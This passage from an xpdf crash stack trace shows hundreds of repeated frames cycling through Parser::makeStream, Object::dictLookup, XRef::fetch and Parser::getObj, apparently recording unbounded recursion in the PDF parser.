CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #34 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #35 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #36 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #37 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #38 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #39 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #40 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #41 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #42 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #43 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #44 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #45 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #46 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #47 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #48 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #49 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #50 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #51 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #52 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #53 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #54 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #55 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #56 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #57 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #58 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #59 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #60 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #61 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #62 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #63 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #64 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #65 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #66 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #67 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #68 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #69 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #70 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #71 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #72 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #73 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #74 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #75 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #76 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #77 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #78 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #79 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #80 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #81 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #82 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #83 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #84 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #85 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #86 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #87 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #88 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #89 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #90 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #91 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #92 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #93 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #94 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #95 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #96 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #97 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #98 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #99 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #100 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #101 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #102 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #103 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #104 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #105 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #106 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #107 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #108 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #109 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #110 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #111 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #112 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #113 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #114 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #115 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #116 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #117 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #118 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #119 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #120 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #121 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #122 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #123 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #124 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #125 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #126 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #127 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #128 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #129 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #130 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #131 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #132 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #133 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #134 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #135 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #136 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #137 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #138 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #139 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #140 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #141 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #142 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #143 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #144 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #145 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #146 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #147 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #148 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #149 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #150 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #151 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #152 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #153 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #154 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #155 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #156 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #157 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #158 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #159 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #160 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #161 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #162 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #163 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #164 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #165 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #166 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #167 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #168 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #169 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #170 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #171 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #172 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #173 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #174 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #175 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #176 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #177 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #178 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #179 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #180 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #181 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #182 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #183 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #184 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #185 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #186 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #187 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #188 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #189 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #190 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #191 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #192 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #193 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #194 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #195 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #196 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #197 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #198 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #199 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #200 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #201 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #202 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #203 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #204 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #205 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #206 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #207 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #208 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #209 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #210 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #211 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #212 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #213 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #214 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #215 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #216 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #217 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #218 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #219 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #220 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #221 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #222 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #223 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #224 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #225 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #226 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #227 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #228 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #229 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #230 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #231 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #232 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #233 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #234 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #235 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #236 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #237 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #238 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #239 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #240 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #241 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #242 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #243 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #244 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #245 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #246 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #247 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #248 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #249 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #250 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #251 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #252 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #253 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #254 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #255 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #256 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #257 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #258 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #259 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #260 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #261 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #262 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #263 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #264 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #265 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #266 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #267 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #268 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #269 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #270 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #271 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #272 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #273 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #274 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #275 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #276 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #277 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #278 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #279 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #280 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #281 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #282 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #283 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #284 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #285 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #286 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #287 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #288 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #289 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #290 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #291 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #292 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #293 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #294 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #295 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #296 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #297 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #298 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #299 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #300 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #301 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #302 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #303 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #304 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #305 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:156 #306 0x557ed05e3bd5 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) xpdf/Parser.cc:94 #307 0x557ed05daee0 in XRef::fetch(int, int, Object*) xpdf/XRef.cc:824 #308 0x557ed05e1ddf in Object::dictLookup(char*, Object*) xpdf/Object.h:253 #309 0x557ed05e1ddf in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) 